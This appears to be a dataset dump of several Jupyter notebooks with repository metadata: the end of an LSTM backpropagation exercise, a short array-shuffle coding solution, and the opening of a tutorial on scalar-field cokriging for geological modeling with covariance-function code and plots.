"np.random.seed(1)\nxt = np.random.randn(3,10)\na_prev = np.random.randn(5,10)\nc_prev = np.random.randn(5,10)\nWf = np.random.randn(5, 5+3)\nbf = np.random.randn(5,1)\nWi = np.random.randn(5, 5+3)\nbi = np.random.randn(5,1)\nWo = np.random.randn(5, 5+3)\nbo = np.random.randn(5,1)\nWc = np.random.randn(5, 5+3)\nbc = np.random.randn(5,1)\nWy = np.random.randn(2,5)\nby = np.random.randn(2,1)\n\nparameters = {\"Wf\": Wf, \"Wi\": Wi, \"Wo\": Wo, \"Wc\": Wc, \"Wy\": Wy, \"bf\": bf, \"bi\": bi, \"bo\": bo, \"bc\": bc, \"by\": by}\n\na_next, c_next, yt, cache = lstm_cell_forward(xt, a_prev, c_prev, parameters)\n\nda_next = np.random.randn(5,10)\ndc_next = np.random.randn(5,10)\ngradients = lstm_cell_backward(da_next, dc_next, cache)\nprint(\"gradients[\\\"dxt\\\"][1][2] =\", gradients[\"dxt\"][1][2])\nprint(\"gradients[\\\"dxt\\\"].shape =\", gradients[\"dxt\"].shape)\nprint(\"gradients[\\\"da_prev\\\"][2][3] =\", gradients[\"da_prev\"][2][3])\nprint(\"gradients[\\\"da_prev\\\"].shape =\", gradients[\"da_prev\"].shape)\nprint(\"gradients[\\\"dc_prev\\\"][2][3] =\", gradients[\"dc_prev\"][2][3])\nprint(\"gradients[\\\"dc_prev\\\"].shape =\", gradients[\"dc_prev\"].shape)\nprint(\"gradients[\\\"dWf\\\"][3][1] =\", gradients[\"dWf\"][3][1])\nprint(\"gradients[\\\"dWf\\\"].shape =\", gradients[\"dWf\"].shape)\nprint(\"gradients[\\\"dWi\\\"][1][2] =\", gradients[\"dWi\"][1][2])\nprint(\"gradients[\\\"dWi\\\"].shape =\", gradients[\"dWi\"].shape)\nprint(\"gradients[\\\"dWc\\\"][3][1] =\", gradients[\"dWc\"][3][1])\nprint(\"gradients[\\\"dWc\\\"].shape =\", gradients[\"dWc\"].shape)\nprint(\"gradients[\\\"dWo\\\"][1][2] =\", gradients[\"dWo\"][1][2])\nprint(\"gradients[\\\"dWo\\\"].shape =\", gradients[\"dWo\"].shape)\nprint(\"gradients[\\\"dbf\\\"][4] =\", gradients[\"dbf\"][4])\nprint(\"gradients[\\\"dbf\\\"].shape =\", gradients[\"dbf\"].shape)\nprint(\"gradients[\\\"dbi\\\"][4] =\", gradients[\"dbi\"][4])\nprint(\"gradients[\\\"dbi\\\"].shape =\", gradients[\"dbi\"].shape)\nprint(\"gradients[\\\"dbc\\\"][4] =\", gradients[\"dbc\"][4])\nprint(\"gradients[\\\"dbc\\\"].shape =\", gradients[\"dbc\"].shape)\nprint(\"gradients[\\\"dbo\\\"][4] =\", gradients[\"dbo\"][4])\nprint(\"gradients[\\\"dbo\\\"].shape =\", gradients[\"dbo\"].shape)",
"_____no_output_____"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **gradients[\"dxt\"][1][2]** =\n </td>\n <td>\n 3.23055911511\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dxt\"].shape** =\n </td>\n <td>\n (3, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da_prev\"][2][3]** =\n </td>\n <td>\n -0.0639621419711\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da_prev\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dc_prev\"][2][3]** =\n </td>\n <td>\n 0.797522038797\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dc_prev\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWf\"][3][1]** = \n </td>\n <td>\n -0.147954838164\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWf\"].shape** =\n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWi\"][1][2]** = \n </td>\n <td>\n 1.05749805523\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWi\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWc\"][3][1]** = \n </td>\n <td>\n 2.30456216369\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWc\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWo\"][1][2]** = \n </td>\n <td>\n 0.331311595289\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWo\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbf\"][4]** = \n </td>\n <td>\n [ 0.18864637]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbf\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbi\"][4]** = \n </td>\n <td>\n [-0.40142491]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbi\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbc\"][4]** = \n </td>\n <td>\n [ 0.25587763]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbc\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbo\"][4]** = \n </td>\n <td>\n [ 0.13893342]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbo\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"### 3.3 Backward pass through the LSTM RNN\n\nThis part is very similar to the `rnn_backward` function you implemented above. You will first create variables of the same dimension as your return variables. You will then iterate over all the time steps starting from the end and call the one step function you implemented for LSTM at each iteration. You will then update the parameters by summing them individually. Finally return a dictionary with the new gradients. \n\n**Instructions**: Implement the `lstm_backward` function. Create a for loop starting from $T_x$ and going backward. For each step call `lstm_cell_backward` and update the your old gradients by adding the new gradients to them. Note that `dxt` is not updated but is stored.",
"_____no_output_____"
]
],
[
[
"def lstm_backward(da, caches):\n \n \"\"\"\n Implement the backward pass for the RNN with LSTM-cell (over a whole sequence).\n\n Arguments:\n da -- Gradients w.r.t the hidden states, numpy-array of shape (n_a, m, T_x)\n caches -- cache storing information from the forward pass (lstm_forward)\n\n Returns:\n gradients -- python dictionary containing:\n dx -- Gradient of inputs, of shape (n_x, m, T_x)\n da0 -- Gradient w.r.t. the previous hidden state, numpy array of shape (n_a, m)\n dWf -- Gradient w.r.t. the weight matrix of the forget gate, numpy array of shape (n_a, n_a + n_x)\n dWi -- Gradient w.r.t. the weight matrix of the update gate, numpy array of shape (n_a, n_a + n_x)\n dWc -- Gradient w.r.t. the weight matrix of the memory gate, numpy array of shape (n_a, n_a + n_x)\n dWo -- Gradient w.r.t. the weight matrix of the save gate, numpy array of shape (n_a, n_a + n_x)\n dbf -- Gradient w.r.t. biases of the forget gate, of shape (n_a, 1)\n dbi -- Gradient w.r.t. biases of the update gate, of shape (n_a, 1)\n dbc -- Gradient w.r.t. biases of the memory gate, of shape (n_a, 1)\n dbo -- Gradient w.r.t. biases of the save gate, of shape (n_a, 1)\n \"\"\"\n\n # Retrieve values from the first cache (t=1) of caches.\n (caches, x) = caches\n (a1, c1, a0, c0, f1, i1, cc1, o1, x1, parameters) = caches[0]\n \n ### START CODE HERE ###\n # Retrieve dimensions from da's and x1's shapes (≈2 lines)\n n_a, m, T_x = None\n n_x, m = None\n \n # initialize the gradients with the right sizes (≈12 lines)\n dx = None\n da0 = None\n da_prevt = None\n dc_prevt = None\n dWf = None\n dWi = None\n dWc = None\n dWo = None\n dbf = None\n dbi = None\n dbc = None\n dbo = None\n \n # loop back over the whole sequence\n for t in reversed(range(None)):\n # Compute all gradients using lstm_cell_backward\n gradients = None\n # Store or add the gradient to the parameters' previous step's gradient\n dx[:,:,t] = None\n dWf = None\n dWi = None\n dWc = None\n dWo = None\n dbf = None\n dbi = None\n dbc = None\n dbo = None\n # Set the first activation's gradient to the backpropagated gradient da_prev.\n da0 = None\n \n ### END CODE HERE ###\n\n # Store the gradients in a python dictionary\n gradients = {\"dx\": dx, \"da0\": da0, \"dWf\": dWf,\"dbf\": dbf, \"dWi\": dWi,\"dbi\": dbi,\n \"dWc\": dWc,\"dbc\": dbc, \"dWo\": dWo,\"dbo\": dbo}\n \n return gradients",
"_____no_output_____"
],
[
"np.random.seed(1)\nx = np.random.randn(3,10,7)\na0 = np.random.randn(5,10)\nWf = np.random.randn(5, 5+3)\nbf = np.random.randn(5,1)\nWi = np.random.randn(5, 5+3)\nbi = np.random.randn(5,1)\nWo = np.random.randn(5, 5+3)\nbo = np.random.randn(5,1)\nWc = np.random.randn(5, 5+3)\nbc = np.random.randn(5,1)\n\nparameters = {\"Wf\": Wf, \"Wi\": Wi, \"Wo\": Wo, \"Wc\": Wc, \"Wy\": Wy, \"bf\": bf, \"bi\": bi, \"bo\": bo, \"bc\": bc, \"by\": by}\n\na, y, c, caches = lstm_forward(x, a0, parameters)\n\nda = np.random.randn(5, 10, 4)\ngradients = lstm_backward(da, caches)\n\nprint(\"gradients[\\\"dx\\\"][1][2] =\", gradients[\"dx\"][1][2])\nprint(\"gradients[\\\"dx\\\"].shape =\", gradients[\"dx\"].shape)\nprint(\"gradients[\\\"da0\\\"][2][3] =\", gradients[\"da0\"][2][3])\nprint(\"gradients[\\\"da0\\\"].shape =\", gradients[\"da0\"].shape)\nprint(\"gradients[\\\"dWf\\\"][3][1] =\", gradients[\"dWf\"][3][1])\nprint(\"gradients[\\\"dWf\\\"].shape =\", gradients[\"dWf\"].shape)\nprint(\"gradients[\\\"dWi\\\"][1][2] =\", gradients[\"dWi\"][1][2])\nprint(\"gradients[\\\"dWi\\\"].shape =\", gradients[\"dWi\"].shape)\nprint(\"gradients[\\\"dWc\\\"][3][1] =\", gradients[\"dWc\"][3][1])\nprint(\"gradients[\\\"dWc\\\"].shape =\", gradients[\"dWc\"].shape)\nprint(\"gradients[\\\"dWo\\\"][1][2] =\", gradients[\"dWo\"][1][2])\nprint(\"gradients[\\\"dWo\\\"].shape =\", gradients[\"dWo\"].shape)\nprint(\"gradients[\\\"dbf\\\"][4] =\", gradients[\"dbf\"][4])\nprint(\"gradients[\\\"dbf\\\"].shape =\", gradients[\"dbf\"].shape)\nprint(\"gradients[\\\"dbi\\\"][4] =\", gradients[\"dbi\"][4])\nprint(\"gradients[\\\"dbi\\\"].shape =\", gradients[\"dbi\"].shape)\nprint(\"gradients[\\\"dbc\\\"][4] =\", gradients[\"dbc\"][4])\nprint(\"gradients[\\\"dbc\\\"].shape =\", gradients[\"dbc\"].shape)\nprint(\"gradients[\\\"dbo\\\"][4] =\", gradients[\"dbo\"][4])\nprint(\"gradients[\\\"dbo\\\"].shape =\", gradients[\"dbo\"].shape)",
"_____no_output_____"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **gradients[\"dx\"][1][2]** =\n </td>\n <td>\n [-0.00173313 0.08287442 -0.30545663 -0.43281115]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dx\"].shape** =\n </td>\n <td>\n (3, 10, 4)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da0\"][2][3]** =\n </td>\n <td>\n -0.095911501954\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da0\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWf\"][3][1]** = \n </td>\n <td>\n -0.0698198561274\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWf\"].shape** =\n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWi\"][1][2]** = \n </td>\n <td>\n 0.102371820249\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWi\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWc\"][3][1]** = \n </td>\n <td>\n -0.0624983794927\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWc\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWo\"][1][2]** = \n </td>\n <td>\n 0.0484389131444\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWo\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbf\"][4]** = \n </td>\n <td>\n [-0.0565788]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbf\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbi\"][4]** = \n </td>\n <td>\n [-0.06997391]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbi\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbc\"][4]** = \n </td>\n <td>\n [-0.27441821]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbc\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbo\"][4]** = \n </td>\n <td>\n [ 0.16532821]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbo\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"### Congratulations !\n\nCongratulations on completing this assignment. You now understand how recurrent neural networks work! \n\nLet's go on to the next exercise, where you'll use an RNN to build a character-level language model.\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
e70922329339d7bedeb88fe80963a72c27caccb8 | 1,709 | ipynb | Jupyter Notebook | easy/shuffle an array.ipynb | FourierYe/algorithm_python | 24c56f82cecb8b4614722094ca8cfc63cefba670 | [
"MIT"
] | null | null | null | easy/shuffle an array.ipynb | FourierYe/algorithm_python | 24c56f82cecb8b4614722094ca8cfc63cefba670 | [
"MIT"
] | null | null | null | easy/shuffle an array.ipynb | FourierYe/algorithm_python | 24c56f82cecb8b4614722094ca8cfc63cefba670 | [
"MIT"
] | null | null | null | 25.132353 | 78 | 0.472206 | [
[
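[
"# Editor's note (hedged): the Solution class below pops random elements out of\n# a list, which costs O(n^2) overall. The standard in-place alternative is the\n# Fisher-Yates shuffle (what random.shuffle implements); a tiny illustrative\n# demo, independent of the submission below:\nimport random\n\ndef fisher_yates(arr):\n    # walk from the end, swapping each slot with a uniformly chosen earlier one\n    for i in range(len(arr) - 1, 0, -1):\n        j = random.randrange(i + 1)\n        arr[i], arr[j] = arr[j], arr[i]\n    return arr\n\nprint(fisher_yates(list(range(10))))",
"_____no_output_____"
],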
[
"import random\nclass Solution:\n\n def __init__(self, nums: List[int]):\n self.nums = nums\n self.default = list(self.nums)\n\n def reset(self) -> List[int]:\n \"\"\"\n Resets the array to its original configuration and return it.\n \"\"\"\n self.nums = list(self.default)\n return self.default\n\n def shuffle(self) -> List[int]:\n \"\"\"\n Returns a random shuffling of the array.\n \"\"\"\n cp_nums = list(self.nums)\n\n for i in range(len(cp_nums)):\n nums_index = random.randrange(len(self.nums))\n cp_nums[i] = self.nums.pop(nums_index)\n \n self.nums = cp_nums\n\n return self.nums\n \n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(nums)\n# param_1 = obj.reset()\n# param_2 = obj.shuffle()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
e7092507a5f93b21b5c2ed76af4e40073c635c20 | 206,587 | ipynb | Jupyter Notebook | geomodeling/scalar_field_cokriging_minimal_example.ipynb | cgre-aachen/teaching | 411bd3df76b7efee4a4ee311e06d1b0cf9aab8a1 | [
"MIT"
] | 9 | 2018-02-16T10:24:51.000Z | 2021-07-30T13:13:28.000Z | geomodeling/scalar_field_cokriging_minimal_example.ipynb | cgre-aachen/teaching | 411bd3df76b7efee4a4ee311e06d1b0cf9aab8a1 | [
"MIT"
] | null | null | null | geomodeling/scalar_field_cokriging_minimal_example.ipynb | cgre-aachen/teaching | 411bd3df76b7efee4a4ee311e06d1b0cf9aab8a1 | [
"MIT"
] | 4 | 2018-01-08T08:36:19.000Z | 2022-01-29T11:55:08.000Z | 115.154404 | 71,768 | 0.84121 | [
[
[
"# Minimal working example for cokringing of a scalar field for geological modeling\n\nThe aim of this notebook is to explain in simple steps the scalar-field (or: potential-field) interpolation implemented in GemPy and GeoModeller, based on Lajaunie et al. (1997) and Calcagno et al. (2008). The derivation and description of the covariance functions follows from the thesis of Aug (2004) and the implementation in GemPy (de la Varga et al., submitted).\n\n## Basic principle behind a scalar-field interpolation\n\nThe method is based on a zonation principle, i.e. a segmentation of continuous space into discrete zones with similar properties (or other aspects of interest). Typical examples are the distinction of rock units with different lithological features (e.g. different types of sandstones, clay layers, magmatic sequences, etc), but also metamorphic sequences that can be distinguished. Quite generally, it is basically the same concept that is underlying the construction of geological map.\n\nThe general idea behind this interpolation method is that geological structures exhibit a specific continuity. As a very basic first principle, we can consider the deposition of sedimentary sequences, for example in a marine environment: we may observe a sequence of more sand-dominated and more clay-dominated units. In a quiet and continuous sedimentation environment, we can assume that we have wide lateral continuity and a \"layer-by-layer\" deposition.\n\nIn the context of geomodeling, we may attempt to describe now these sedimented zones by the interface surfaces between them. It is then obvious that these surfaces should not cross (considering no disturbance during sedimentation). Furthermore, we can assume that the layers show a specific influence on each other: to first order, they can be considered as parallel. And, maybe for a finer distinction, we can assume that a (topographic) variability of in one layer (for example a sea mound, to stay in our example) has a certain upward continuation and can potentially still be apparent (though to a lesser extent) on the next interface above.\n\nWe can now take a more abstract view and assume that we do not only have two or three interfaces, but more or less a continuous description of subsequent layers, representing a continuous sedimentation process and showing a similar continuous influence on each other, and the layer interfaces can not cross. \n\nWith this intuition, we can describe these layer interfaces as isosurfaces in a scalar field. In our example, we can even interpret the scalar field values as related to a specific depositional age (note that this notion will not generally be possible - nor a requirement). Even further, we can interpret the gradient of this scalar field as orientation values, i.e. measurements of strike/ dip/ dip direction in a geological sequence.\n\nThe question now is: how can we interpolate this scalar field from a set of limited observations of surface contact points and orientation measurements?",
"_____no_output_____"
],
[
"## Notation and scalar field interpolation\n\nMultiple methods are possible to obtain this scalar field. A very common approach (mostly from the field of image segmentation, but also applied in geophysics) is to use a Level Set formulation (Chan & Vese?). Other previous approaches implemented Radial Basis Functions (RBF's, e.g. the implementation in LeapFrog, see also Hillier, 2014) and a stochastic time interpretation (? Mallet 2004 - the GoCAD implicit modeling approach). We use here a geostatistical method based on (universal) co-kriging, described in Lajaunie et al., 1997.\n\nWe denote the 3-D surface in an *implicit* form (therefore also the name of these methods as \"implicit geomodeling\"), associated with a function $\\psi_\\alpha$ such that (Lajaunie et al., 1997):\n\n$$C_\\alpha = \\{x : \\psi_a(x) = 0 \\}$$\n\n\nWe describe the scalar field that we aim to obtain as a function $T( \\vec{x} )$. \n\nNext, we denote $Z$ as a realization of the (differentiable) random function $\\psi$. We now use a kriging method to to estimate $Z$ in the entire domain of interest.\n\nNote: important basic principle: multivariate (co-)kriging, IRK-f model (Matheron!) CHECK!!\n\nHowever, co-kriging is not \"standard\" form, as variables are algebraically linked!\n\nMore notation:\n\nGradient data:\n\n$$\\frac{\\partial Z}{\\partial x} (x_i) = G_i^x$$\n\n$$\\frac{\\partial Z}{\\partial y} (x_i) = G_i^y$$\n\nTangent vector $\\tau_i$ is defined through a scalar product:\n\n$$ <\\nabla Z(x_i), \\tau_i > = 0$$\n\nPoints on a single interface belong to a single set $J_k$, $k$ is the index of the interface.\n\nIncrements for points on a single interface, the increments must be zero:\n\n$$Z(x_j) - Z(x_{j'}) = 0 \\;\\;\\forall (j,j') \\in J_k$$\n\n\n### The spatial model\n\nAs we only consider increments, we can only obtain a (unique) solution when we fix/ select an arbitrary origin $x_0$ and we estimate increments with respect to this origin:\n\n$$Z(x) - Z(x_0) = \\sum_{i \\in I} \\left( \\lambda_i G_i^x + \\mu_i G_i^y \\right) + \\sum_{i' + I'} <\\nabla Z(x_{i'}), \\tau_{i'} > + \\sum_k \\sum_{jj' \\in \\mathcal{P}(J_k)} \\lambda_{jj'}[Z(x_j) - Z(x_{j'})] $$ \n\n\n$\\mathcal{P}(J_k)$ is the set of pairs associated with one interface $J_k$. Note that, in this formulation, the contribution from the scalar field increments for points on one interface $Z(x_j) - Z(x_{j'})$ would theoretically be zero. However, the consideration of this (zero-)increment is essential in order to obtain the co-kriging equations, in which these terms will matter (see below).\n\nIn a sense, the interpolation can be interpreted as a co-kriging of increments and gradients. Chiles (2004) actually describes it as a kriging of a gradient field - with the additional contribution of \"zero-increment\" constraints for points on one interface. \n\n### Derivation of the co-kriging equations\n\n\n(See Chiles book for derivation of universal co-kriging equations!)\n\nWe now have to set up the kriging equation to solve for the parameters/ coefficients $\\lambda_i, \\mu_i, \\lambda_{jj'}$ in order to obtain an (explicit?) equation that we can use to determine the potential field value at any point in space.",
"_____no_output_____"
],
[
"### Covariance functions\n\nThe situation is (a \"bit\") complicated by the fact that we have to consider all covariances and cross-covariances of each function involved.\n\n\n(Side note/ Idea/ Check: can the same form of co-kriging be used in the context of posterior-space estimation/ reduced order modeling, etc. - i.e. all the cases where kriging is used, also ML? Because: we could estimate the gradient quite easily using AD-methods and the approach could lead to a more robust estimate? )\n\nFor simplicity in the description, we consider an isotropic covariance field. We follow the description in Lajaunie et al. (1997) and denote the covariance of $Z$ as $K_Z$. Furthermore, a vector connecting two points in space is:\n\n$$\\vec{h} = \\vec{x} - \\vec{y}$$\n\nAnd the components of this vector in $x$- and $y$-direction respectively are $h_x$ and $h_y$. The base covariance function is:\n\n$$K_Z(\\vec{h}) = C_Z(r)$$\n\nIn order for $Z$ to be differentiable, $K_Z$ must be twice differentiable. Under these conditions (??), the covariances are:\n\n$$K_{ZG^x}(\\vec{x} - \\vec{y})= Cov(Z(x),Z_x'(y)) = - \\frac{h_x}{r} C_Z'(r)$$\n\nSimilar:\n\n$$K_{G^x G^y}((\\vec{x} - \\vec{y})$$\n\n$$K_{G^x}((\\vec{x} - \\vec{y})$$\n\nAs a first test, we use the covariance functions defined in Lajaunie et al. for the Gaussian model (pg. 578):\n\nIf\n\n$$C(r) = \\exp{-(r/a)^2}$$\nthen:\n\n$$K_{ZG^x}(\\vec{h}) = -2 \\frac{h_x}{a^2} C(r)$$\n\n$$K_{G^x}(\\vec{h}) = \\left(\\frac{2}{a^2} - 4 \\frac{x^2}{a^4} \\right) C(r)$$\n\n$$K_{G^x G^y}(\\vec{h}) = -4 \\frac{h_x h_y}{a^4} C(r)$$\n\nwhere $\\vec{h} = \\vec{x} - \\vec{y}$, $r = |\\vec{h}|$ and $h_x$ the component of $\\vec{h}$ in $x$-direction, etc.\n\n<div class=\"alert alert-info\">\n <strong>To do (Miguel?):</strong> Include better covariance function (spline?).\n</div>\n\n**To Do**\": Include equations for cubic covariance functions (see notebook and description in paper of Miguel)",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
],
[
"# define covariance functions (note: no nugget effect so far...):\n\ndef K_Z(h, a=25.):\n r = np.sqrt(h[0]**2 + h[1]**2)\n return np.exp(-(r/a)**2)\n \n# cross-cov space-grad\ndef K_ZGx(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return -2 * hx/a**2 * K_Z(h,a) * 5\n\ndef K_ZGy(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1] \n return -2 * hy/a**2 * K_Z(h,a) * 5\n\n# cov grad\ndef K_Gx(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return (2/a**2 - 4 * hx**2/a**4) * K_Z(h,a)* 5\n\ndef K_Gy(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1]\n return (2/a**2 - 4 * hy**2/a**4) * K_Z(h,a)* 5\n\n# cross-cov grad\ndef K_GxGy(h, a=25.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n hy = h[1]\n return -4 * hx * hy /a**4 * K_Z(h,a)* 5\n\n \n# From Miguel's prototype notebooks\n\ndef cov_cubic_f(r, a = 1):\n c_o = a**2/14/3\n if r > a:\n ans_d0 = 0\n else:\n ans_d0 = c_o*(1-7*(r/a)**2+35/4*(r/a)**3-7/2*(r/a)**5+3/4*(r/a)**7)\n # ans_d0[r>a] = 0\n return ans_d0\n\ncov_cubic_f = np.vectorize(cov_cubic_f)\n\ndef cov_cubic_d1_f(r, a = 1.):\n c_o = a**2/14/3\n if r>a:\n ans_d1 = 0\n else:\n ans_d1 = (-7* (a - r)**3 *r* (8* a**2 + 9 *a* r + 3* r**2)* (c_o))/(4* a**7)\n return ans_d1\n\ncov_cubic_d1_f = np.vectorize(cov_cubic_d1_f)\n \ndef cov_cubic_d2_f(r, a = 1.):\n c_o = a**2/14/3\n if r>a:\n ans_d2 = 0\n else:\n ans_d2 = (-7 * (4.* a**5. - 15. *a**4. * r + 20. *( a**2)*(r**3) - 9* r**5) * \n (c_o))/(2*a**7)\n return ans_d2\n\ncov_cubic_d2_f = np.vectorize(cov_cubic_d2_f)\n\n\n# Now, adjust coariance functions from above:\n\ndef K_Z(h):\n r = np.sqrt(h[0]**2 + h[1]**2)\n return cov_cubic_f(r)\n\n# cross-cov space-grad\ndef K_ZGx(h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n return -hx/r * cov_cubic_d1_f(r)\n\ndef K_ZGy(h, a=5.):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1] \n return -hy/r * cov_cubic_d1_f(r)\n\n# cov grad\ndef K_Gx(h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n if r == 0:\n return 1/3.\n else:\n return (hx**2/r**3 - 1/r) * cov_cubic_d1_f(r) - (hx/r)**2 * cov_cubic_d2_f(r)\n\ndef K_Gy(h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hy = h[1]\n if r == 0:\n return 1/3.\n else:\n return (hy**2/r**3 - 1/r) * cov_cubic_d1_f(r) - (hy/r)**2 * cov_cubic_d2_f(r)\n\n# cross-cov grad\ndef K_GxGy(h):\n \"\"\"Note: requires the vector h!\"\"\"\n r = np.sqrt(h[0]**2 + h[1]**2)\n hx = h[0]\n hy = h[1]\n if r == 0:\n return 0\n else:\n return hx * hy /r**2 * (1/r * cov_cubic_d1_f(r) - cov_cubic_d2_f(r))\n",
"_____no_output_____"
]
],
[
[
"Create a plot of the cubic covariance functions:",
"_____no_output_____"
]
],
[
[
"rs = np.arange(0.01,2,0.01)\nhs = np.vstack([-rs, rs]).transpose()\n# determine h-vectors:\nv1 = cov_cubic_f(rs)\n# for h vector: use 45 degrees/ [1,1]-direction with increasing distance\nplt.plot(rs, v1, label='C(r)')\nplt.plot(rs, cov_cubic_d1_f(rs), label='C\\'(r)')\nplt.plot(rs, cov_cubic_d2_f(rs), label='C\\'\\'(r)')\n\n# v2 = [K_ZGx(h) for h in hs]\n# plt.plot(rs, v2, label='K_ZGx')\n# plt.plot(rs, K_ZGy(rs))\n# plt.plot(rs, [K_Gx(h) for h in hs], label='K_Gx')\n# plt.plot(rs, [K_GxGy(h) for h in hs], label='K_GxGy')\nplt.legend(loc='best')\nplt.show()",
"_____no_output_____"
],
[
"print(cov_cubic_d2_f(rs)[0])",
"-0.32083499992500003\n"
],
[
"rs = np.arange(0.01,10,0.01)\nhs = np.vstack([-rs, rs]).transpose()\n# determine h-vectors:\nv1 = [K_Z(h) for h in hs]\n# for h vector: use 45 degrees/ [1,1]-direction with increasing distance\nplt.plot(rs, v1, label='K_Z')\n# plt.plot(rs, cov_cubic_d1_f(rs), label='C\\'(r)')\n# plt.plot(rs, cov_cubic_d2_f(rs), label='C\\'\\'(r)')\n\nv2 = [K_ZGx(h) for h in hs]\nplt.plot(rs, v2, label='K_ZGx')\n# plt.plot(rs, K_ZGy(rs))\nplt.plot(rs, [K_Gx(h) for h in hs], label='K_Gx')\nplt.plot(rs, [K_GxGy(h) for h in hs], label='K_GxGy')\nplt.legend(loc='best')\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Universality conditions\n\n\n(Miguel?)",
"_____no_output_____"
],
[
"### Dual form\n\nUnder the above conditions, we can actually write the kriging equations in the dual form and finally obtain the estimator:\n\n",
"_____no_output_____"
],
[
